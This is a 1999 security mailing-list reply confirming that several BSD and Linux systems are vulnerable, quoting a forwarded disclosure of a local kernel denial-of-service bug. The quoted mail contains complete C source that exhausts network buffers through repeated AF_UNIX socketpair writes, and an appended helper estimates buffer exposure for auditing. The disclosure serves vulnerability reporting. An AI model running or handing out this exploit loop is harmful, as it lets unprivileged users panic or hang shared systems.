Sven,

I have verified the following platforms:

BSDI 2.1
BSDI 3.1
BSDI 4.0
BSDI 4.0.1
Cobalt Linux (MIPS) - RedHat based

All vulnerable.

I am testing on other Linux platforms, but I presume all BSD and Linux-based systems are affected. I have no resources to test this on Solaris, AIX, HP and System-V based systems.

I would venture a guess that MacOS X may be vulnerable since I am fairly sure that most of the socket code is lifted directly from BSD.

JD

On Wed, 1 Sep 1999, Sven Berkvens wrote:

>Recently, I mailed this mailing to a number of people who are concerned
>with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The
>mailing was NOT intended to be made public, but somehow it was. Here is
>my original mailing:
>
>
>--- Forwarded ---
>
>I stumbled across a denial of service attack on FreeBSD systems, where
>an unprivileged user can panic the kernel. Quick and dirty testing
>(code attached at the end of this mail) showed OpenBSD is vulnerable
>too:
>
>FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
>test it on older FreeBSD versions.
>
>OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
>The kernel logs one "/bsd: mb_map full" and all processes trying to send
>something over the network get stuck waiting in mbuf. Locally the system
>continues to function. Tested by a friend.
>
>NetBSD: Not available, but it is highly probable that the affected code
>in OpenBSD is from its parent NetBSD.
>
>As far as I'm concerned, this can be handled quietly and without much
>haste. Knowledge of this problem is limited and there is absolutely no
>intention of publishing this exploit or messages to Bugtraq.
>
>With kind regards,
>Sven Berkvens (svenat_private)
>Long time FreeBSD-system administrator
>
>
>
>The source code for the program that causes this:
>
>#include <unistd.h>
>#include <sys/socket.h>
>#include <fcntl.h>
>
>#define BUFFERSIZE 204800
>
>extern int
>main(void)
>{
>    int p[2], i;
>    char crap[BUFFERSIZE];
>
>    while (1)
>    {
>        if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
>            break;
>        i = BUFFERSIZE;
>        setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
>        setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
>        setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
>        setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
>        fcntl(p[0], F_SETFL, O_NONBLOCK);
>        fcntl(p[1], F_SETFL, O_NONBLOCK);
>        write(p[0], crap, BUFFERSIZE);
>        write(p[1], crap, BUFFERSIZE);
>    }
>    exit(0);
>}
>
>----- End forwarded message -----
>

===========================================
John N Dvorak | dvorakat_private
Director of Technology
CapuNet, LLC - Corporate Internet Solutions
(301) 881-4900 x8018
===========================================
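Added example, not part of the original messages or of any vendor's code: a small audit helper an administrator can run as an ordinary user to see what send-buffer size the kernel actually grants for the 204800-byte request in the report, and how that multiplies against the per-process descriptor limit. The function names are hypothetical, and the estimate assumes each open descriptor holds one full buffer and ignores per-buffer kernel overhead.

```c
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/resource.h>

#define REQUESTED 204800   /* buffer size requested in the report */

/* Request `want` bytes of send buffer on one AF_UNIX socket and return
 * the size the kernel reports as in effect, or -1 on error. */
long granted_sndbuf(int want)
{
    int p[2], got = 0;
    socklen_t len = sizeof(got);
    long result = -1;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
        return -1;
    (void)setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &want, sizeof(want));
    if (getsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &got, &len) == 0)
        result = got;
    close(p[0]);
    close(p[1]);
    return result;
}

/* Estimate (assumption: one full buffer per descriptor) of the socket
 * buffer memory a single process could reserve. Returns -1 when the
 * descriptor limit is unlimited or the buffer size is unknown. */
long long worst_case_bytes(long per_socket, rlim_t nofile)
{
    if (per_socket < 0 || nofile == RLIM_INFINITY)
        return -1;
    return (long long)per_socket * (long long)nofile;
}

int main(void)
{
    struct rlimit rl;
    long per = granted_sndbuf(REQUESTED);

    if (getrlimit(RLIMIT_NOFILE, &rl) == -1)
        return 1;
    printf("SO_SNDBUF in effect: %ld bytes\n", per);
    printf("RLIMIT_NOFILE (soft): %llu\n", (unsigned long long)rl.rlim_cur);
    printf("estimate per process: %lld bytes\n", worst_case_bytes(per, rl.rlim_cur));
    return 0;
}
```

Compare the estimate with the memory the kernel sets aside for network buffers (NMBCLUSTERS on the BSDs named above); a user who may run several processes multiplies it again.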